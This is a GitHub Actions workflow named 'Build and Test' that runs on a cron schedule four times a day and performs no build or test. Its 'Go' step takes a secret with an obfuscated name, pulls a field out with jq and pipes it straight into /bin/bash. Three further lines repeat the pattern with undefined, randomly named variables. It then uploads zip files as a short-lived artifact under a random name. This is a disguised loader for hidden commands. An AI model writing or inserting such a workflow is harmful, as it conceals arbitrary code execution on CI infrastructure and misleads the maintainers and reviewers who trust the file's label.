name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '26 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          fsc077: ${{ secrets.fsc077 }}
        run: |
          printf '%s' "$fsc077" | jq -r .oibmx0 | /bin/bash
          printf '%s' "$dscyo05857" | jq -r .kqcql77682 | /bin/bash
          echo $burxy2 | jq -r .jtb2274 | /bin/bash
          echo $td92 | jq -r .wist03585 | /bin/bash

      - name: Archive results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: EWWrabgy
          path: "*.zip"
          retention-days: 1
